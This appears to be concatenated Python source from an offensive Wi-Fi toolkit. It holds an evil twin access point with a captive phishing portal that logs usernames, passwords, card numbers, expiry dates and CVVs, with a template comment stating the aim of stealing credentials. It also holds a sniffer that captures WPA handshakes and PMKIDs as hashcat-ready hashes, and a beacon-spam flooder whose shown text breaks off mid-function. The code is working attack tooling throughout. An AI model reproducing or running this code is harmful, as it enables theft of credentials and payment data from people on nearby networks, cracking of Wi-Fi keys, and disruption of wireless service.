        delete_iptables_rule(f"nat", f"PREROUTING -i {wlan} -p tcp --dport 80 -j DNAT --to-destination {ip_addr}")
        delete_iptables_rule(f"filter", f"FORWARD -i {wlan} -p tcp --dport 80 -d {ip_addr} -j ACCEPT")

        mod_path(path="/etc/hostapd/hostapd.conf", mod="ren")
        mod_path(path="/etc/default/hostapd", mod="ren")
        mod_path(path="/etc/dnsmasq.conf", mod="ren")
        mod_path(path="/etc/network/interfaces", mod="ren")
        iprint("Original configs restored, restarting Network Manager..")
        safecall(f"sudo systemctl restart NetworkManager")

class CaptivePortalHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        try:
            if self.path == '/hotspot-detect.html':
                self.path = '/index.html'
            elif self.path == '/action.html':
                self.path = '/action.html'
            elif not os.path.exists(self.path[1:]):
                self.path = '/index.html'
            return SimpleHTTPRequestHandler.do_GET(self)
        except Exception as e:
            self.send_error(500, f"Internal server error: {str(e)}")

    def do_POST(self):
        try:
            if self.path == '/action.html':
                content_length = int(self.headers['Content-Length'])
                post_data = self.rfile.read(content_length)
                fields = dict(x.split('=') for x in post_data.decode().split('&'))
                username = fields.get('username', '')
                password = fields.get('password', '')
                credit_card = fields.get('credit', '')
                expiry_date = fields.get('expire', '')
                cvv = fields.get('cvv', '')
                if credit_card == '':
                    print(f"{cc.BRIGHT}{cc.GREEN}Captured credentials - {cc.BLUE}Username: {cc.WHITE}{username}, {cc.RED}Password: {cc.WHITE}{password}{cc.RESET}")
                else:
                    print(f"{cc.BRIGHT}{cc.GREEN}Captured credentials - {cc.CYAN}Card number: {credit_card}, Expire date: {expiry_date}, CVV: {cvv}")
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                with open('action.html', 'rb') as file:
                    self.wfile.write(file.read())
            elif self.path == '/data':
                content_length = int(self.headers['Content-Length'])
                post_data = self.rfile.read(content_length)
                data = json.loads(post_data.decode())
                print(f"{cc.BRIGHT}{cc.GREEN}Collected Data: {cc.WHITE}{data}{cc.RESET}")
                self.send_response(200)
                self.send_header('Content-type', 'application/json')
                self.end_headers()
                self.wfile.write(json.dumps({'status': 'success'}).encode())
            else:
                self.send_response(404)
                self.end_headers()
        except Exception as e:
            self.send_error(500, f"Internal server error: {str(e)}")

    def handle_one_request(self):
        try:
            super().handle_one_request()
        except Exception as e:
            self.send_error(400, f"Bad request: {str(e)}")


class WebServer:
    def __init__(self, ip_addr):
        self.ip_addr = ip_addr
        server_thread = threading.Thread(target=self.start_captive_portal)
        server_thread.daemon = True
        server_thread.start()

    def get_template_name(self, template_dir):
        if os.path.exists(template_dir):
            templates = os.listdir(template_dir)
            cprint("Listing templates...")
            for i, item in enumerate(templates):
                cprint(f"{i}) {item}")
            temp_num = int(cinput("Enter template number"))
            if 0 <= temp_num < len(templates):
                return templates[temp_num]
        return None

    def start_captive_portal(self):
        templates_dir = f"{script_dir}/templates"
        if not os.path.exists(templates_dir):
            os.makedirs(templates_dir, exist_ok=True)
        choice_template = self.get_template_name(templates_dir)
        if choice_template:
            os.chdir(os.path.join(templates_dir, choice_template))
            handler = CaptivePortalHandler
            httpd = HTTPServer((self.ip_addr, 80), handler)
            iprint(f"Serving captive portal on {cc.GREEN}http://{self.ip_addr}:80 {cc.RESET}")
            print(cc.LIGHT_BLUE, cc.BRIGHT, "Evil Twin has started!", cc.BLUE)
            httpd.serve_forever()
        else:
            print("No valid template selected. Exiting.")

class ConfigManager:
    def __init__(self):
        self.config_file = os.path.join(script_dir, "_config")
        if not os.path.exists(f"{script_dir}/_config"):
            self.write_app_config(DEFAULT_APP="mousepad", SSID="Freeway WiFi", MAC="random", CHANNEL=6, HW_MODE="g", DRIVER="nl80211", IP="10.0.0.15")

    def get_config_value(self, key):
        if os.path.exists(f"{script_dir}/_config"):
            config_data = self.read_config()
            return config_data.get(key, "")

    def read_config(self):
        config_data = {}
        try:
            with open(self.config_file, "r") as f:
                for line in f:
                    key, value = line.strip().split("=", 1)
                    config_data[key] = value
        except Exception as e:
            wprint(f"Failed to read the configuration file! {e}")
        return config_data

    def write_app_config(self, **kwargs):
        config_data = {
            'DEFAULT_APP': kwargs.get('DEFAULT_APP', self.get_config_value("DEFAULT_APP")),
            'CHANNEL': kwargs.get('CHANNEL', self.get_config_value("CHANNEL")),
            'MAC': kwargs.get('MAC', self.get_config_value("MAC")),
            'HW_MODE': kwargs.get('HW_MODE', self.get_config_value("HW_MODE")),
            'DRIVER': kwargs.get('DRIVER', self.get_config_value("DRIVER")),
            'SSID': kwargs.get('SSID', self.get_config_value('SSID')),
            'IP': kwargs.get('IP', self.get_config_value('IP'))
        }
        try:
            with open(self.config_file, "w") as f:
                for key, value in config_data.items():
                    f.write(f"{key}={value}\n")
            cprint(f"Success, config modified. Sometimes you need to restart the app so the changes apply!")
            time.sleep(2)
        except Exception as e:
            wprint(f"Failed to write the configuration file! {e}")
            time.sleep(1)
        finally:
            self.default_app = self.get_config_value("DEFAULT_APP")

class Cappy:
    def __init__(self, interface, ssid="Freeway WiFi", channel=6, mac_addr="random"):
        self.interface = interface
        self.ssid = ssid
        self.channel = channel
        self.mac_addr = mac_addr
        cprint("Checking dependencies..")
        check_dependencies(["dnsmasq", "lighttpd", "hostapd"])
        self.check_dirs()
        self.config = ConfigManager()
        self.ip_addr = self.config.get_config_value("IP")
        self.run_cappy()
        self.post_init()

    def post_init(self):
        conf = Config(inf=self.interface, ssid=self.ssid, channel=self.channel, ip_addr=self.ip_addr)
        conf.ip_config(self.interface)
        conf.handle_services()
        conf.handle_networking(self.interface)

    def check_dirs(self):
        if not os.path.exists("/usr/local/share/3way/templates"):
            cprint("Creating templates dir...")
            os.makedirs("/usr/local/share/3way/templates")
            templates = ["Valentines", "mrhacker", "google", "mcd"]
            for template in templates:
                shutil.copytree(f"templates/{template}", f"/usr/local/share/3way/templates/{template}")
                
    def run_cappy(self):
        try:
            for interface in self.interface:
                change_mac_address(interface, mac=self.mac_addr)
            self.buy_orange_cappy()
            action = self.read_cappy_composition()
            self.template_path = "/usr/local/share/3way/templates"
            self.drink_healthy_juice(action)
        except KeyboardInterrupt:
            wprint("\nExiting..\n")
            sys.exit(0)

    def take_off_the_plastic_cap(self):
        self.buy_orange_cappy()
        action = self.read_cappy_composition()
        self.drink_healthy_juice(action)

    def buy_orange_cappy(self):
        os.system('clear')
        print(f"""
{cc.ORANGE}  _
{cc.GREEN} |c|   {cc.ORANGE}┏┓        
{cc.ORANGE}.'a`.  {cc.ORANGE}┃ ┏┓┏┓┏┓┓┏
{cc.GREEN}| p |  {cc.ORANGE}┗┛┗┻┣┛┣┛┗┫
{cc.ORANGE}| p |  {cc.ORANGE}    ┛ ┛  ┛        
{cc.ORANGE}|_y_|         {cc.BRIGHT}{cc.GREEN}healthy diet, {cc.RED}happy{cc.GREEN} stomach.{cc.RESET}
                {cc.BRIGHT}{cc.MAGENTA}by FLOCK4H{cc.RESET}
""")
        time.sleep(1)

    def read_cappy_composition(self):
        actions = {1: "Start", 2: "Create Template", 3: "Edit Template", 4: "Remove Template", 5: "List Templates", 6: "Edit Config"}
        for index, action in actions.items():
            cprint(f"{index}) {action}")
        decision = cinput(f"{cc.BRIGHT}[CAPPY]", color=cc.CYAN)
        return decision
    
    def throw_away_plastic_bottle(self):
        pass

    def drink_healthy_juice(self, action):
        if action == "1":
            return
        elif action == "2":
            name = cinput("Name the template")
            self.create_new_template(name)
            iprint("Template created! Path: /usr/local/share/3way/templates/{} \ Name: {}".format(name, name))
            time.sleep(2)
        elif action == "3":
            self.mod_template("edit")
        elif action == "4":
            self.mod_template("remove")
        elif action == "5":
            self.mod_template("list")
        elif action == "6":
            self.edit_config()
        
        self.take_off_the_plastic_cap()

    def edit_config(self):
        print("")
        changable = {1: "SSID", 2: "MAC", 3: "HW_MODE", 4: "DRIVER", 5: "CHANNEL", 6: "DEFAULT_APP", 7: "IP"}
        for idx, o in changable.items():
            cprint(f"{idx}) {o}")
        modify = cinput("Enter index to modify")
        for idx, o in changable.items():
            if modify == str(idx):
                self.modify_value(o)

    def modify_value(self, v):
        new_val = cinput(f"Enter new value of {v}")
        self.config.write_app_config(**{v: new_val})
        if v == "IP":
            self.ip_addr = new_val
        cprint(f"Changed {v} to {new_val}!")
        time.sleep(1)

    def mod_template(self, mod):
        if mod == "edit":
            self.default_app = self.config.default_app
            name = cinput("Enter name of the template to edit")
            template_path = f"{self.template_path}/{name}"
            try:
                if os.path.exists(template_path):
                    cprint(f"Found the template! Using {self.default_app} to edit, press Ctrl+C to change the default program.")
                    time.sleep(2)
                    cmd = f"{self.default_app} {template_path}/index.html".replace("\n", "").strip(" ")
                    cprint(cmd)
                    time.sleep(2)
                    os.system(cmd)
                else:
                    wprint("Couldn't find the template of name {}".format(name))
            except KeyboardInterrupt:
                name = cinput("Enter name of a program to set as default (e.g., nano, code, geany, thonny)")
                self.config.write_app_config(DEFAULT_APP=name)
                iprint("Changes applied, restart the app.")
                sys.exit(0)
        elif mod == "list":
            for item in os.listdir(self.template_path):
                cprint(item)
            time.sleep(3)
        elif mod == "remove":
            name = cinput("Name of the template to remove")
            for item in os.listdir(self.template_path):
                if item == name.strip():
                    shutil.rmtree(os.path.join(self.template_path, item))
                    iprint("Successfully removed {} template.".format(name))
                    time.sleep(2)
                    return
            wprint("Coulnd't find a template with this name")
            time.sleep(1.5)
            
    def create_new_template(self, name):
        try:
            if not os.path.exists(f"{self.template_path}/{name}"):
                os.makedirs(f"{self.template_path}/{name}")
            with open(f"{self.template_path}/{name}/index.html", "w") as f:
                f.write("<html><h1>Here put the HTML content of the site, this file is the first site that user will see after associating.</h1></html>")
            with open(f"{self.template_path}/{name}/action.html", "w") as f:
                f.write("""<html><h1>
    <!-- Here goes the code after submitting the form, 
    in order to steal credentials, we must add 'form' tag with 
    'username', 'password', 'submit' tags to the index.html file -->
    Hello! 
</h1></html>""")
        
        except Exception as e:
            wprint("Exception in 'create_new_template'", e)


# audit.py
from scapy.all import *
from scapy.layers.dot11 import Dot11Beacon, Dot11, Dot11Elt, Dot11ProbeReq, Dot11ProbeResp, Dot11AssoReq, Dot11Auth, RadioTap, Dot11AssoResp, Dot11Ack, Dot11QoS 
from scapy.layers.eap import EAPOL
import os
import time
import curses

from rich.console import Console
from datetime import timedelta

try:
    from FreewayTools.colors import wprint
    from FreewayTools.monitor import get_signal_strength, save_hash_file, init_colors
    from FreewayTools.checkmac import check_manufacturer

except ModuleNotFoundError:
    from colors import wprint
    from monitor import get_signal_strength, save_hash_file, init_colors
    from checkmac import check_manufacturer

def get_ap_uptime(packet):
    if packet.haslayer(Dot11Beacon):
        timestamp = packet[Dot11Beacon].timestamp
        uptime_seconds = timestamp / 1000000
        uptime_delta = timedelta(seconds=int(uptime_seconds))
        days = uptime_delta.days
        hours = uptime_delta.seconds // 3600
        return f"{days}d {hours}h"
    return None

class Sniffer:
    def __init__(self, interface, console, script_dir=None, target=None, ssid=None, results=None, clients=None, debug=False):
        self.script_dir = script_dir
        self.interface = interface
        self.target = target
        self.ssid = ssid
        self.console = console
        self.results = results
        self.clients = clients
        self.debug = debug
        self.handshakes = {}
        self.pmkids = {}
        self.handshake_dir = os.path.join(self.script_dir or "/usr/local/share/3way", "caps/audit/handshakes")
        self.pmkids_dir = os.path.join(self.script_dir or "/usr/local/share/3way", "caps/audit/pmkids")
        os.makedirs(self.handshake_dir, exist_ok=True)
        os.makedirs(self.pmkids_dir, exist_ok=True)

    def debugprint(self, text, style="white"):
        if self.debug:
            self.console.print(text, style=style)

    def packet_handler(self, packet):
        if EAPOL in packet:
            timestamp = datetime.now().strftime('%m-%d %H:%M:%S')
            self.handle_eapol_frame(packet, timestamp)
            self.packet_analyzer(packet, types="eapol")
        elif packet.haslayer(Dot11):
            self.debugprint(f"ADDR1: {packet.addr1} <-> ADDR2: {packet.addr2} || {packet}", style="blue")
            if packet.haslayer(Dot11Beacon):
                self.packet_analyzer(packet, types="beacon")
            elif packet.haslayer(Dot11ProbeReq):
                self.packet_analyzer(packet, types="probereq")
            elif packet.haslayer(Dot11ProbeResp):
                self.packet_analyzer(packet, types="proberesp")
            elif packet.haslayer(Dot11Auth):
                self.packet_analyzer(packet, types="auth")
            elif packet.haslayer(Dot11AssoReq):
                self.packet_analyzer(packet, types="asso_req")
            elif packet.haslayer(Dot11AssoResp):
                self.packet_analyzer(packet, types="asso_resp")
            elif packet.haslayer(Dot11Ack):
                self.packet_analyzer(packet, types="ack")
            elif packet.haslayer(Dot11QoS):
                self.packet_analyzer(packet, types="qos_data")
            else:
                if packet.type == 1:
                    subtype = packet.subtype
                    if subtype == 0x09:
                        self.packet_analyzer(packet, types="block_ack_req")
                    elif subtype == 0x0b:
                        self.packet_analyzer(packet, types="block_ack")
                    elif subtype == 0x0B:
                        self.packet_analyzer(packet, types="rts")
                    elif subtype == 0x0C:
                        self.packet_analyzer(packet, types="cts")

    def handle_eapol_frame(self, packet, timestamp):
        """
            Capture WPA 2/3 handshakes and PMKIDs for all sessions.
        """

        if not self.target:
            return

        src_mac = packet.addr2
        dst_mac = packet.addr1

        if src_mac == self.target or dst_mac == self.target:
            session_id = f"{src_mac}-{dst_mac}"
            session_id_reversed = f"{dst_mac}-{src_mac}"
            self.debugprint(f"{timestamp}--Detected EAPOL Packet! Logging session-id: {session_id}", style='red')

            if session_id not in self.handshakes or session_id not in self.pmkids:
                self.handshakes[session_id] = {'to_frames': 0, 'from_frames': 0, 'packets': []}
                self.pmkids[session_id] = {'num_frame': 0, 'first_eapol_frame': None, 'pmkid': None, 'mac_ap': None, 'mac_cl': None, 'packets': []} 

            # PMKIDs
            if session_id_reversed in self.pmkids:
                temp_data = self.pmkids[session_id]
                del self.pmkids[session_id]
                self.pmkids[session_id_reversed]['num_frame'] = temp_data['num_frame']
                session_id = session_id_reversed

            self.pmkids[session_id]['num_frame'] += 1

            if self.pmkids[session_id]['num_frame'] == 1:
                self.pmkids[session_id]['first_eapol_frame'] = bytes(packet[EAPOL])
                self.pmkids[session_id]['pmkid'] = self.pmkids[session_id]['first_eapol_frame'][-16:].hex()
                self.pmkids[session_id]['mac_ap'] = packet.addr2
                self.pmkids[session_id]['mac_cl'] = packet.addr1
                self.debugprint(f"Detected 1st EAPOL PMKID packet for {self.pmkids[session_id]}")

            if self.pmkids[session_id]['num_frame'] == 2:
                if not self.ssid:
                    self.debugprint(f"Detected second EAPOL PMKID packet but we didnt catch the SSID yet! Session: {self.pmkids[session_id]}")
                    return
                self.results[src_mac]["PMKIDs"].add(timestamp)
                self.debugprint("\n1st EAPoL Frame:   \n" + str(self.pmkids[session_id]['first_eapol_frame']) + "\n")
                self.debugprint("Possible PMKID:        ", self.pmkids[session_id]['pmkid'])
                ssid_hex = bytes(self.ssid, 'utf-8').hex()
                self.debugprint("SSID:                  ", self.ssid)
                mac_ap_formatted = self.pmkids[session_id]['mac_ap'].replace(":", "").lower()
                mac_cl_formatted = self.pmkids[session_id]['mac_cl'].replace(":", "").lower()
                self.debugprint("MAC AP:                ", mac_ap_formatted)
                self.debugprint("MAC Client:            ", mac_cl_formatted)
                self.debugprint("\nEncoded PMKID compatible with Hashcat hc22000:")
                hash_line = f"{self.pmkids[session_id]['pmkid']}*{mac_ap_formatted}*{mac_cl_formatted}*{ssid_hex}"
                self.debugprint(hash_line)
                save_hash_file(os.path.join(self.pmkids_dir,"pmkid_" + timestamp), hash_line)

            # Handshakes
            to_ds = packet.FCfield & 0x1 != 0
            from_ds = packet.FCfield & 0x2 != 0

            if to_ds and not from_ds:
                self.handshakes[session_id]['to_frames'] += 1
            elif not to_ds and from_ds:
                self.handshakes[session_id]['from_frames'] += 1

            self.handshakes[session_id]['packets'].append(packet)

            filename = os.path.join(self.handshake_dir, f"{session_id}_handshake.pcap")
            dump = PcapWriter(filename, append=True, sync=True)
            dump.write(packet)

            if self.handshakes[session_id]['to_frames'] >= 2 and self.handshakes[session_id]['from_frames'] >= 2:
                if src_mac in self.results:
                    self.results[src_mac]["Handshakes"].add(timestamp)
                self.debugprint(f"Captured complete WPA handshake for session {session_id}")
                self.handshakes[session_id] = {'to_frames': 0, 'from_frames': 0, 'packets': []}

    def get_ssid(self, packet):
        if packet.haslayer(Dot11Elt) and (packet.haslayer(Dot11Beacon) or packet.haslayer(Dot11ProbeResp)):
            ssid = packet[Dot11Elt].info.decode('utf-8', 'ignore') if packet[Dot11Elt].info else "Hidden SSID"
            return ssid
        return "0"

    def get_macs(self, packet, types):
        if types == "probereq":
            mac_cl = packet.addr2
            mac_ap = packet.addr1 # Usually ff:ff:ff:ff:ff:ff
        elif types == "rts":
            mac_cl = packet.addr2
            mac_ap = packet.addr1
        elif types == "qos_data": # This can have either AP or station as addr1 & addr2
            mac_cl = packet.addr2
            mac_ap = packet.addr1
        elif types == "cts":
            mac_cl = packet.addr2
            mac_ap = packet.addr1
        elif types == "block_ack_req": # This can have either AP or station as addr1 & addr2
            mac_cl = packet.addr1
            mac_ap = packet.addr2
        elif types == "block_ack": # This can have either AP or station as addr1 & addr2
            mac_cl = packet.addr1
            mac_ap = packet.addr2
        else:
            mac_cl = packet.addr1
            mac_ap = packet.addr2

        return mac_cl, mac_ap

    def packet_analyzer(self, packet, types):
        mac_cl, mac_ap = self.get_macs(packet, types)
        old_mac_ap = mac_ap
        if self.target and mac_cl == self.target:
            mac_ap = mac_cl
            mac_cl = old_mac_ap

        enc = self.determine_encryption(packet)
        ssid = self.get_ssid(packet)
        channel = self.extract_channel(packet)
        signal = get_signal_strength(packet)
        uptime = get_ap_uptime(packet)
        timestamp = datetime.now().strftime('%m-%d %H:%M')

        updated = False
        if (mac_ap == self.target or ssid == self.ssid) and (self.target not in self.results):
            self.debugprint(f"Friendly packet detected!")
            self.target = mac_ap
            self.ssid = ssid
            self.results[self.target] = {"SSID(s)": set(), "CHANNEL(s)": set(), "SIGNAL": signal, "CLIENTS": set(), 
            "KNOWN_TO": set(), "ENC": enc, "FRAMES": 0, "DATA(QoS)": 0, "EAPOLS": 0, "PMKIDs": set(), "Handshakes": set(),
            "MANUFACTURER": check_manufacturer(self.target) if self.target else "Not Yet", "UPTIME": uptime, "LAST SEEN": timestamp}
            updated = True

        if self.target in self.results:
            if not updated and mac_ap == self.target:
                if types == "beacon":
                    self.results[self.target]['UPTIME'] = uptime
                elif types == "qos_data":
                    self.results[self.target]['DATA(QoS)'] += 1 
                elif types == "auth" and types == "eapol":
                    self.results[self.target]['EAPOLS'] += 1
                if packet.haslayer(RadioTap) and packet.haslayer(Dot11Elt):
                    if channel != "N/A":
                        self.results[self.target]['CHANNEL(s)'].add(channel)
                    self.results[self.target]['SIGNAL'] = signal
                    if ssid != "0":
                        self.results[self.target]['SSID(s)'].add(ssid)
                    self.results[self.target]['ENC'] = enc
                self.results[self.target]['FRAMES'] += 1

            if types == "auth" or types == "asso_req" or types == "asso_resp" and ssid == self.ssid:
                if mac_cl not in self.results[self.target]['CLIENTS']:
                    self.results[self.target]['CLIENTS'].add(mac_cl)
                    self.results[self.target]['KNOWN_TO'].add(mac_cl)
                self.clients[mac_cl] = {"SIGNAL": signal,"MANUFACTURER": check_manufacturer(mac_cl), "LAST SEEN": timestamp}

            elif types == "auth" or types == "asso_req" or types == "asso_resp" and ssid != self.ssid:
                self.debugprint(f"Check passed. Not target SSID!", style="red")
                if mac_cl in self.results[self.target]['CLIENTS']:
                    self.results[self.target]['CLIENTS'].remove(mac_cl)
                    del self.clients[mac_cl]
                    self.debugprint(f"I removed the client {mac_cl} from target!", style="red")

            if (types == "rts" or types == "qos_data" or types == "block_ack") and mac_ap == self.target:
                if mac_cl not in self.results[self.target]['CLIENTS']:
                    self.results[self.target]['CLIENTS'].add(mac_cl)
                    self.results[self.target]['KNOWN_TO'].add(mac_cl)
                self.clients[mac_cl] = {"SIGNAL": signal,"MANUFACTURER": check_manufacturer(mac_cl), "LAST SEEN": timestamp}


    def extract_channel(self, packet):
        channel = "N/A"
        if packet.haslayer(RadioTap) and packet.haslayer(Dot11Elt):
            try:
                channel = ord(packet[Dot11Elt:3].info)
            except TypeError:
                pass
            except IndexError:
                pass
            except Exception as e:
                self.debugprint(f"In function extract_channel: {type(e).__name__}: {str(e)}")
        return channel

    def determine_encryption(self, packet):
        """Determines encryption type of the AP"""
        encryption = "Open"
        if packet.haslayer(Dot11Elt):
            rsn_found = packet.getlayer(Dot11Elt, ID=48)
            wpa_found = packet.getlayer(Dot11Elt, ID=221)
            
            if rsn_found:
                encryption = self.parse_rsn_element(rsn_found)

            elif wpa_found and b'\x00P\xf2\x01\x01\x00' in wpa_found.info:
                encryption = "WPA"

        return encryption

    def parse_rsn_element(self, rsn_elt):
        """Determines encryption type included in RSN"""
        encryption = "WPA2"

        if len(rsn_elt.info) > 2:
            asc = int.from_bytes(rsn_elt.info[10:12], byteorder='little')

            if asc > 0:
                akm_offset = 12
                for _ in range(asc):
                    akm_suite = rsn_elt.info[akm_offset:akm_offset+4]
                    if akm_suite in [b'\x00\x0F\xAC\x02', b'\x00\x0F\xAC\x05']:
                        encryption += " (Personal)"
                    elif akm_suite in [b'\x00\x0F\xAC\x01', b'\x00\x0F\xAC\x05']:
                        encryption = "WPA2 Enterprise"
                    elif akm_suite in [b'\x00\x0F\xAC\x08', b'\x00\x0F\xAC\x09', b'\x00\x0F\xAC\x12']:
                        encryption = "WPA3 Enterprise"
                    elif akm_suite == b'\x00\x0F\xAC\x04':
                        encryption = "WPA3"

                    akm_offset += 4

        return encryption

    def run_sniff(self):
        while True:
            try:
                sniff(iface=self.interface, prn=self.packet_handler, store=0, monitor=True)
                time.sleep(1)
            except OSError as e:
                wprint(f"Network error: {e}")

class Audit:
    def __init__(self, interface, mac, ssid, script_dir=None, debug=False):
        self.debug = debug
        self.script_dir = script_dir or "/usr/local/share/3way"
        self.interface = interface
        self.target_mac = mac
        self.ssid = ssid
        self.console = Console()
        self.clients = {}
        self.results = {}
        self.sniffer = Sniffer(interface=self.interface, console=self.console, script_dir=self.script_dir, target=self.target_mac, ssid=self.ssid, results=self.results, clients=self.clients, debug=self.debug)

    def init_monitor_mode(self):
        try:
            for interface in self.interface:
                os.system(f'sudo iwconfig {interface} mode monitor')
        except Exception as e:
            wprint(f"Error while putting interface in monitor mode: {e}")

    def run_audit(self):
        self.init_monitor_mode()
        threading.Thread(target=self.sniffer.run_sniff, daemon=True).start()
        if not self.debug:
            curses.wrapper(setup_curses, self)
        else:
    
            last_print_time = time.time()

            while True:
                cur_time = time.time()
                if cur_time - last_print_time >= 10:
                    self.sniffer.debugprint(f"Results: {self.results}")
                    self.sniffer.debugprint(f"Clients: {self.clients}")
                    
                    last_print_time = cur_time

def setup_curses(stdscr, audit_instance):
    curses.curs_set(0)
    init_colors()
    stdscr.nodelay(1)
    display_results(stdscr, audit_instance)

def safe_addstr(stdscr, y, x, text, attr=None):
    """ 
        Ensures the text can be added to the view
        basing on terminal width and height
    """
    max_y, max_x = stdscr.getmaxyx()
    if attr is None:
        attr = curses.A_NORMAL

    if y < max_y and x < max_x:
        try:
            stdscr.addstr(y, x, text, attr)
        except curses.error:
            pass
        except ValueError:
            pass

def display_results(stdscr, audit_instance):
    running = True
    last_refreshed = time.time()
    while running:
        current_time = time.time()
        if current_time - last_refreshed >= 10:
            stdscr.clear()
            stdscr.refresh()
            last_refreshed = current_time

        stdscr.refresh()
        max_y, max_x = stdscr.getmaxyx()
        mid_point_y = max_y // 2
        mid_point_x = max_x // 2

        results_window = curses.newwin(mid_point_y, max_x, 0, 0)
        clients_window = curses.newwin(mid_point_y, max_x, mid_point_y, 0)

        results_window.border()
        clients_window.border()

        safe_addstr(results_window, 0, 2, " Network Results ", curses.color_pair(2) | curses.A_BOLD)
        safe_addstr(results_window, 2, 30, "Press 'q' or 's' to stop audit", curses.color_pair(3) | curses.A_BOLD)

        safe_addstr(clients_window, 0, 2, " Client Details ", curses.color_pair(1) | curses.A_BOLD)

        display_data(results_window, audit_instance.results, mid_point_y)
        display_data(clients_window, audit_instance.clients, mid_point_y, True)

        stdscr.refresh()
        results_window.refresh()
        clients_window.refresh()

        if stdscr.getch() in [ord('q'), ord('s')]:
            safe_addstr(results_window, 2, 30, " " * (max_x - 30))
            safe_addstr(results_window, 2, 30, " Press anything to quit ", curses.color_pair(3) | curses.A_BOLD)
            results_window.refresh()
            running = False

    stdscr.nodelay(False)
    stdscr.getch()

def display_data(window, data, max_lines, is_client=False):
    y = 2
    x_offset = 1
    
    column_width = max(40, window.getmaxyx()[1] // 3)
    max_possible_columns = window.getmaxyx()[1] // column_width
    columns = min(max_possible_columns, len(data)) if max_possible_columns > 0 else 1

    for index, (mac, details) in enumerate(data.items()):
        current_col = index % columns
        x_position = x_offset + (current_col * column_width)

        if current_col == 0 and index != 0:
            y += 1
        
        if y + 5 >= max_lines: 
            safe_addstr(window, max_lines - 1, 3, "+ more...", curses.A_BOLD)
            break

        safe_addstr(window, y, x_position, f"MAC: {mac}", curses.A_BOLD)
        detail_y = y + 1
        for key, value in details.items():
            if detail_y >= max_lines - 1:
                safe_addstr(window, max_lines - 1, 3, "+ more...", curses.A_BOLD)
                return

            if key in ['CLIENTS', 'KNOWN_TO']:
                value_str = str(len(value))
            elif key == "MANUFACTURER":
                value_str = value if len(value) <= 26 else value[:23] + '...'
            else:
                value_str = ', '.join(str(v) for v in value) if isinstance(value, set) else str(value)
            
            safe_addstr(window, detail_y, x_position + 2, f"{key}: {value_str}")
            detail_y += 1

        if current_col == columns - 1:
            y = detail_y

def main():
    audit_instance = Audit(interface=["wlan0"], mac="a4:2b:4c:23:ad:e6", ssid="Test", debug=False)
    audit_instance.init_monitor_mode()
    threading.Thread(target=audit_instance.sniffer.run_sniff, daemon=True).start()
    curses.wrapper(setup_curses, audit_instance)

if __name__ == "__main__":
    main()



# beacon_spam.py
from scapy.all import *
from scapy.layers.dot11 import Dot11Beacon, Dot11Elt, Dot11ProbeReq, Dot11ProbeResp, Dot11AssoReq, Dot11Auth, Dot11, Dot11Deauth, RadioTap, Dot11AssoResp, Dot11Disas, Dot11QoS
import os
import time
from rich.console import Console
from rich.table import Table
from rich.live import Live
from random import choice
import threading

try:
    from FreewayTools.colors import cprint, wprint, cinput, ColorCodes

except ModuleNotFoundError:
    from colors import cprint, wprint, cinput, ColorCodes

def random_mac():
    mac = [random.randint(0x00, 0xff) for _ in range(6)]
    mac[0] = (mac[0] & 0xfe) | 0x02
    return ':'.join(map(lambda x: format(x, '02x'), mac))

thread_event = threading.Event()

class BeaconSpam:
    def __init__(self, interface, parms):
        self.interface = interface
        self.parms = parms
        self.console = Console()
        self.verbose = True if "v" in self.parms else False
        self.randmac = True if "r" in self.parms else False
        self.statmac = cinput("Enter any static mac") if not self.randmac else ""
        self.rand_select = True if "2" in self.parms else False
        path = cinput(f"Enter file name ({ColorCodes().BRIGHT}{ColorCodes().WHITE}/lists{ColorCodes().RESET}{ColorCodes().CYAN} folder)") if "1" in self.parms else None
        self.ssid_list = self.load_ssid_list(path=path if path is not None else "ssid_list.txt") if "1" in self.parms or "2" in self.parms else None
        self.random_ssid_list = self.generate_random_ssid_list() if "3" in self.parms or "4" in self.parms else None
        self.weird_frames = True if "4" in self.parms else False
        self.device_mac = ""
        self.current_ssid = "Unitinialized"
        self.data = {"Beacons": 0, "Clients": 0, "Responses": 0}
        self.threads = cinput("Number of threads") if "t" in self.parms else 1

    def generate_random_ssid_list(self):
        l = "abcdefghijklmnoprstqwxyz"
        n = "0123456789"
        c = "!@#$%^&*()_+-=/?<.>,}{][;:\|~`"
        length = random.randint(8, 32)
        count = 2000
        ssids = []

        for _ in range(count):
            ssid_length = random.randint(8, length)
            ssid = ''.join(random.choice(l + n + c) for _ in range(ssid_length))
            ssids.append(ssid)

        return ssids

    def load_ssid_list(self, path="ssid_list.txt", path_d="/usr/local/share/3way/lists/"):
        try:
            joint = path_d + path
            if self.rand_select:
                files = os.listdir(path_d)
                cprint(f"Available files in '/usr/local/share/3way/lists/': {files}")
                path = choice(files)
                with open(path_d + path, "r") as f:
                    ssids = f.read()
                    ssids = ssids.split("\n")
                    return ssids                

            if os.path.exists(joint):
                with open(joint, "r") as f:
                    ssids = f.read()
                    ssids = ssids.split("\n")
                    return ssids
            else:
                with open(os.path.join(path_d, path), "r") as f:
                    ssids = f.read()
                    ssids = ssids.split("\n")
                    return ssids                


            if self.verbose:
                print(self.ssid_list, type(self.ssid_list))

        except Exception as e:
            wprint(f"In load_ssid_list in BeaconSpam class: {str(e)}")            

    def init_monitor_mode(self, mode="monitor"):
        try:
            for interface in self.interface:
                os.system(f'sudo iwconfig {interface} mode {mode}')
        except Exception as e:
            wprint(f"Error while putting interface in monitor mode: {e}")

    def weirdspammer(self, interface):
        while not thread_event.is_set():
            try:
                self.send_wframe(interface)
            except OSError:
                wprint("Network is down, retrying...")
            except ValueError:
                self.console.print("Catched ValueError due to oversized SSID, ignore it..", style="yellow")

    def bspammer(self, interface):
        while not thread_event.is_set():
            try:
                self.send_bframe(choice(self.ssid_list if self.ssid_list else self.random_ssid_list), interface)
            except OSError:
                wprint("Network is down, retrying...")
            except ValueError:
                self.console.print("Catched ValueError due to oversized SSID, ignore it..", style="yellow")

    def generate_corrupted_ssid(self):
        unusual_chars = [
            "\u200B", "\u200C", "\u200D", "\u202F", "\u205F", "\u2060",  # Spaces and invisible characters
            "ą", "ę", "ł", "ń", "ó", "ś", "ź", "ż",  # Polish characters
            "أ", "ب", "ت", "ث", "ج",  # Arabic characters
            "©", "®", "™", "℠",  # Copyright and trademark symbols
            "Ω", "π", "φ", "δ", "∞",  # Mathematical symbols
            "♥", "♦", "♣", "♠",  # Card suits
        ]
        length = random.randint(8, 102)
        return ''.join(random.choice(unusual_chars) for _ in range(length))

    def send_wframe(self, interface):
